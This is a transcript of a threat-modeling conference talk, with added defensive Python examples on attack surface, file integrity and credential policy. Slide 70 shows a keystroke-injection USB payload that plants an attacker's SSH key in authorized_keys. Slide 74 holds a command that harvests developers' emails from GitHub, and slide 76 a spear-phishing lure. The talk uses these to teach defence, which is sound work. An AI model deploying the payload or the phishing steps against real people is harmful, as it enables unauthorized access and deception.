Slide 1

Thinking Evil Thoughts
A taste of threat modeling (without introducing more risk)
Gareth Rushgrove, Puppet

Slide 2

@garethr

Slide 3

Gareth Rushgrove

Slide 4

This Talk
What to expect

Slide 5

- What is threat modeling?
- Getting the scope right
- Identifying risks
- Using conferences to hack people

Slide 6

Introduce some security language to help you navigate the domain

Slide 7

Dive straight into examples

Slide 8

Empower you to ask questions more than provide easy answers

Slide 9

Threat modeling
A brief introduction

Slide 10

THREAT MODELING: a procedure for optimizing network security by identifying objectives and vulnerabilities

Slide 11

- Determine scope
- Identify threat agents and attacks
- Understand existing countermeasures
- Identify vulnerabilities
- Prioritise risks
- Identify countermeasures

https://www.owasp.org/index.php/Category:Threat_Modeling

Slide 12

“Inside each of us, there is the seed of both good and evil. It's a constant struggle as to which one will win.”
Eric Burdon

Slide 13

Think evil.

Slide 14

Getting the scope right
Avoiding gaps in your threat model

Slide 15

Ignoring part of your system when considering security is a common mistake

Slide 16

ATTACK SURFACE: the attack surface of a software environment is the sum of the different points (the "attack vectors") where an unauthorized user (the "attacker") can try to enter data to or extract data from an environment.

Slide 17

Example
What is Production?

Slide 18

[Diagram: PRODUCTION? Load balancer, front end, back end, database]

Slide 19

[Diagram: PRODUCTION? Load balancer, front end, back end, database; plus people, desktops, CI server]

Slide 20

[Diagram: PRODUCTION? Load balancer, front end, back end, database; plus people, desktops, CI server; plus hypervisor, management, monitoring]

Slide 21

Do you protect your CI stack as well as your production database?

Slide 22

Could I execute a query on your production database if I compromised your CI server?

Slide 23

Example
Third party services

Slide 24

TRUSTED THIRD PARTY: an entity which facilitates interactions between two parties who both trust the third party

Slide 25

TRUST BOUNDARY: a term in computer science and security used to describe a boundary where program data or execution changes its level of "trust". The term refers to any distinct boundary within which a system trusts all sub-systems (including data).
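The scoping question of slides 18 to 25 (what is "production", and where are the trust boundaries?) can be made concrete by writing the diagram down as a graph and asking it the same questions the slides ask. The following Python is an added example, not code from the talk or from Puppet; the components, trust zones and "can act on" edges are a constructed model of the slide diagram, not a description of any real environment. It answers "what could someone reach after compromising the CI server?", lists every path from a developer desktop to the database, and flags the edges that cross a trust boundary, which are the places a threat model most often leaves out of scope.

```python
"""Added example (not from the talk): the "what is production?" diagram as a
graph of components in trust zones, queried the way a threat model would."""
from collections import deque

# Constructed model: component -> trust zone it lives in.
ZONES = {
    "people": "office",
    "desktops": "office",
    "ci_server": "build",
    "hypervisor": "platform",
    "management": "platform",
    "monitoring": "platform",
    "load_balancer": "production",
    "front_end": "production",
    "back_end": "production",
    "database": "production",
}

# Constructed model: A -> B means whoever controls A can deploy to, query,
# or otherwise influence B. Assumed relationships for illustration only.
ACCESS = {
    "people": {"desktops"},
    "desktops": {"ci_server", "management"},
    "ci_server": {"front_end", "back_end"},
    "management": {"hypervisor"},
    "hypervisor": {"load_balancer", "front_end", "back_end", "database"},
    "monitoring": set(),
    "load_balancer": {"front_end"},
    "front_end": {"back_end"},
    "back_end": {"database"},
    "database": set(),
}


def reachable_from(start, access=ACCESS):
    """Components an attacker could influence after compromising `start`
    (breadth-first search over the access graph; `start` itself excluded)."""
    seen = set()
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in access.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    seen.discard(start)
    return seen


def paths_to(target, start, access=ACCESS):
    """All simple paths from `start` to `target`; each one is a chain the
    threat model needs a countermeasure for."""
    results = []

    def walk(node, path):
        if node == target:
            results.append(list(path))
            return
        for nxt in sorted(access.get(node, ())):
            if nxt not in path:
                path.append(nxt)
                walk(nxt, path)
                path.pop()

    walk(start, [start])
    return results


def boundary_crossings(access=ACCESS, zones=ZONES):
    """Edges whose endpoints sit in different trust zones: the trust
    boundaries where authentication, authorisation and validation must happen."""
    crossings = []
    for src, dsts in access.items():
        for dst in dsts:
            if zones[src] != zones[dst]:
                crossings.append((src, dst, zones[src], zones[dst]))
    return sorted(crossings)


def components_outside_production(zones=ZONES):
    """Everything not labelled production that can still reach production:
    the answer to "what is production?" for scoping purposes."""
    return sorted(
        c for c, z in zones.items()
        if z != "production"
        and any(zones[r] == "production" for r in reachable_from(c))
    )


if __name__ == "__main__":
    print("CI server can reach:", sorted(reachable_from("ci_server")))
    for p in paths_to("database", "desktops"):
        print("desktop -> database via", " -> ".join(p))
    for src, dst, zs, zd in boundary_crossings():
        print(f"boundary: {src} ({zs}) -> {dst} ({zd})")
    print("in scope but not labelled production:", components_outside_production())
```

With this model, `components_outside_production()` returns five components that the diagram on slide 18 would have left out of scope, and `boundary_crossings()` shows that the CI server and the hypervisor both sit directly on the production trust boundary, which is why slide 21 asks whether the CI stack is protected as well as the database.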

Slide 26

Slide 27

Why Serverless is a bad name

Slide 28

There are still servers somewhere

Slide 29

How you think about the servers changes, and the respective risks and mitigations change. But servers still exist.

Slide 30

Why NoOps is a bad name

Slide 31

No content

Slide 32

No content

Slide 33

How you think about operations changes, and the respective risks and mitigations change. But operations still exist.

Slide 34

Your attack surface is bigger than you think

Slide 35

Identifying risks
The need to understand your system

Slide 36

Differences in how you perceive a system and how it actually works can be used to exploit it

Slide 37

Example
Immutable infrastructure

Slide 38

“Our systems are immutable, we don’t need runtime file integrity checking”
A possibly naive developer

Slide 39

IMMUTABLE: unchanging over time or unable to be changed. Synonyms: unchangeable, fixed

Slide 40

Containers are not immutable by default

Slide 41

Containers are not immutable by default

Slide 42

$ docker run -d alpine /bin/sh \
    -c "while true; do echo hello world; sleep 1; done"

Slide 43

$ docker exec a7a01beb14de touch /tmp/surprise

Slide 44

$ docker diff a7a01beb14de
C /tmp
A /tmp/surprise

Slide 45

$ docker run --read-only -d alpine /bin/sh \
    -c "while true; do echo hello world; sleep 1; done"

Slide 46

$ docker exec 379150b2cf05 touch /tmp/surprise
touch: cannot touch '/tmp/surprise': Read-only file system

Slide 47

Do your immutable EC2 instances have read-only filesystems?

Slide 48

Most Immutable Infrastructure isn’t

Slide 49

Without technical controls you only have social guarantees of immutability
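Slides 42 to 49 make the point that "immutable" is a social guarantee unless a technical control enforces or at least verifies it. Where a read-only root filesystem (the `--read-only` flag on slide 45) is not an option, the fallback control is the runtime file-integrity check the developer on slide 38 dismissed. The following Python is an added example, not code from the talk: it takes a content-hash baseline of a tree, then reports additions, changes and deletions in the same A/C/D vocabulary `docker diff` used on slide 44. The directory layout and file contents in `demo()` are constructed for illustration.

```python
"""Added example (not from the talk): a minimal runtime file-integrity
check for a filesystem that is supposed to be immutable. It detects
tampering rather than preventing it; prevention is what --read-only gives."""
import hashlib
import os
import tempfile


def take_baseline(root):
    """Map each file path (relative to root) to the SHA-256 of its content."""
    baseline = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            with open(full, "rb") as fh:
                baseline[rel] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def diff_against(baseline, root):
    """Return sorted (status, path) pairs: A added, C changed, D deleted,
    mirroring the letters docker diff prints."""
    current = take_baseline(root)
    changes = []
    for path in set(baseline) | set(current):
        if path not in baseline:
            changes.append(("A", path))
        elif path not in current:
            changes.append(("D", path))
        elif baseline[path] != current[path]:
            changes.append(("C", path))
    return sorted(changes, key=lambda change: change[1])


def _write(root, rel, data):
    """Helper for the constructed scenario: write bytes to root/rel."""
    with open(os.path.join(root, *rel.split("/")), "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a supposedly immutable tree that is touched at
    runtime, much like `docker exec <id> touch /tmp/surprise` on slide 43."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        os.makedirs(os.path.join(root, "etc"))
        _write(root, "app.bin", b"release build 1.0")
        _write(root, "etc/app.conf", b"debug=false\n")
        baseline = take_baseline(root)
        assert diff_against(baseline, root) == []  # untouched tree: no findings

        # Runtime tampering: a new file, a modified binary, a removed config.
        _write(root, "tmp/surprise", b"")
        _write(root, "app.bin", b"release build 1.0 plus something else")
        os.remove(os.path.join(root, "etc", "app.conf"))
        return diff_against(baseline, root)


if __name__ == "__main__":
    for status, path in demo():
        print(status, path)
```

In practice the baseline would be produced at image build time and stored outside the host being checked, and the diff would feed the "event collection and analysis" item from slide 85 rather than a print loop; the check itself is the same.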

Slide 50

Hacking conferences
Looking for vulnerabilities

Slide 51

Let’s assume your applications and infrastructure are super secure*

* This probably isn’t true. You should worry about that as well.

Slide 52

- Penetration testing
- Intrusion detection system
- Web application firewall
- Network firewalls
- Malware scanning
- Configuration management

Slide 53

How secure is your laptop?

Slide 54

- Hand maintained configuration
- Updated whenever
- No central monitoring
- Administrative access
- Single factor authentication

Slide 55

Can you push new Docker images from your laptop?

Slide 56

Can you create jobs on your Jenkins instance from your laptop?

Slide 57

Can you launch new replication controllers from your laptop?

Slide 58

Can you release new functions to Lambda from your laptop?

Slide 59

Real world threat

Slide 60

As a hacker how do I own your laptop?
The fun stuff

Slide 61

Where can I find hundreds of developer laptops…

Slide 62

Developer Conferences are a Target Rich Environment

Slide 63

[Diagram: Wi-Fi networks visible at the conference venue: More Internet, Some Internet, Marks iPhone, FREE CONFERENCE WIFI, Hacked Android, CONFERENCE VENUE, Private Software Circus, Company next door, Coffee shop downstairs, Software Circus II, Docker Corp, Avengers Tower, FON, My Blackberry, Nokia4ever, ABANK]

Slide 64

[Same Wi-Fi network diagram as slide 63] This is the official conference wifi right?

Slide 65

[Same Wi-Fi network diagram as slide 63] Or is it this one? Whatever, both work

Slide 66

Devices exist to man-in-the-middle wireless networks

Slide 67

Who has ever picked up a USB memory stick at a conference?

Slide 68

Slide 69

USB devices exist which will run a script on connect (normally by impersonating a keyboard)

Slide 70

Add my public key

DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OSX-Passwordless-SSH-access-%28ssh-keys%29

Slide 71

Local databases

Slide 72

Lots of people here are on Twitter and using the conference hashtag

Slide 73

Lots of people here are on GitHub with the same username

Slide 74

Email from GitHub user

$ curl -s https://api.github.com/users//events/public \
    | jq '.[].payload.commits[0].author.email' \
    | sort \
    | uniq \
    | grep -v "null"

Slide 75

SPEAR PHISHING: an e-mail spoofing fraud attempt that targets a specific organization or individual, seeking unauthorized access to confidential data.

Slide 76

Hi

Great to see you at last week. I thought you’d be interested in the container testing tool I mentioned. http://nothingevilhere.com. Would love to know what you think. Hopefully see you at DockerCon next year too.

Slide 77

So you’re saying we’re all doomed?
This is quite depressing now I think about it

Slide 78

Part of threat modeling is coming up with suitable mitigations to the risks identified

Slide 79

- 2 factor authentication
- Time-limited credentials
- Separation of duties
- Two person rule
- Configuration management

Slide 80

SEPARATION OF DUTIES: having more than one person required to complete a task. In business the separation by sharing of more than one individual in one single task is an internal control intended to prevent fraud and error.

Slide 81

TWO-PERSON RULE: a control mechanism designed to achieve a high level of security for especially critical material or operations. Under this rule all access and actions require the presence of two authorized people at all times.
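The mitigations on slide 79 and the two definitions that follow are easier to reason about as a single policy check applied to a privileged action such as the "push new Docker images from your laptop" question on slide 55. The following Python is an added example, not code from the talk: it evaluates a request against four of the listed controls (a second factor, time-limited credentials, separation of duties, and the two-person rule) and returns every violation rather than just the first. The `Credential` and `PrivilegedRequest` types, the one-hour credential lifetime and the names in `demo()` are constructed for illustration.

```python
"""Added example (not from the talk): a policy check for a privileged action
that enforces 2FA, time-limited credentials, separation of duties and the
two-person rule, returning the full list of violations."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone


@dataclass
class Credential:
    subject: str           # who this credential identifies
    issued_at: datetime
    ttl: timedelta         # lifetime; time-limited credentials keep this short
    mfa_verified: bool     # was a second factor presented when it was issued?

    def valid_at(self, now):
        return now < self.issued_at + self.ttl


@dataclass
class PrivilegedRequest:
    action: str
    requester: Credential
    approvals: list = field(default_factory=list)  # Credentials of approvers


def check_request(req, now, max_ttl=timedelta(hours=1), approvers_needed=2):
    """Return a list of policy violations; an empty list means proceed."""
    problems = []
    for cred in [req.requester] + req.approvals:
        # 2 factor authentication: everyone involved must have passed MFA.
        if not cred.mfa_verified:
            problems.append(f"{cred.subject}: no second factor")
        # Time-limited credentials: not expired, and not longer-lived than allowed.
        if not cred.valid_at(now):
            problems.append(f"{cred.subject}: credential expired")
        if cred.ttl > max_ttl:
            problems.append(f"{cred.subject}: credential lifetime exceeds {max_ttl}")
    # Separation of duties: the person asking cannot approve their own request.
    approver_names = [a.subject for a in req.approvals]
    if req.requester.subject in approver_names:
        problems.append(f"{req.requester.subject}: requester cannot approve own request")
    # Two-person rule: distinct approvers, so one identity cannot count twice.
    distinct = set(approver_names) - {req.requester.subject}
    if len(distinct) < approvers_needed:
        problems.append(f"need {approvers_needed} distinct approvers, have {len(distinct)}")
    return problems


def demo():
    """Constructed requests: one compliant, one self-approved, one using a
    long-lived single-factor credential of the kind slide 54 describes."""
    now = datetime(2016, 6, 1, 12, 0, tzinfo=timezone.utc)

    def fresh(subject, mfa=True):
        return Credential(subject, now - timedelta(minutes=5), timedelta(hours=1), mfa)

    stale_laptop_token = Credential("alice", now - timedelta(days=30), timedelta(days=90), False)
    requests = {
        "good": PrivilegedRequest("push prod image", fresh("alice"), [fresh("bob"), fresh("carol")]),
        "self_approved": PrivilegedRequest("push prod image", fresh("alice"), [fresh("alice"), fresh("bob")]),
        "stale": PrivilegedRequest("push prod image", stale_laptop_token, [fresh("bob"), fresh("carol")]),
    }
    return {name: check_request(req, now) for name, req in requests.items()}


if __name__ == "__main__":
    for name, problems in demo().items():
        print(name, "->", problems or "OK")
```

Returning every violation matters for the "education" point on slide 86: a developer whose laptop token is refused learns at once that it is both single-factor and ninety days old, rather than fixing one problem and being refused again.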

Slide 82

OPERATIONAL SECURITY (OPSEC): a process that identifies critical information to determine if friendly actions can be observed by enemy intelligence and determines if information obtained by adversaries could be interpreted to be useful to them.

Slide 83

Once you understand the threat you can seek out specific guidance

Slide 84

No content

Slide 85

- Protect data in transit
- Protect data at rest
- Authentication
- Secure boot
- Platform integrity and sandboxing
- Application whitelisting
- Malicious code detection
- Security policy enforcement
- External interface protection
- Device update policy
- Event collection and analysis
- Incident response

https://www.cesg.gov.uk/guidance/end-user-devices-security-principles

Slide 86

Education. Education. Education.

Slide 87

Slide 88

Conclusions
If all you remember is…

Slide 89

With Cloud Native approaches developers are nearer to production than ever before

Slide 90

The efficiency of modern tooling introduces new threats, and magnifies existing ones

Slide 91

Existing mitigations and security controls won’t be enough. You need to collaborate with security colleagues on new approaches

Slide 92

Threat modeling should be part of your development process

Slide 93

Slide 94

Elevation of privilege

Slide 95

Slide 96

Thanks
And any questions?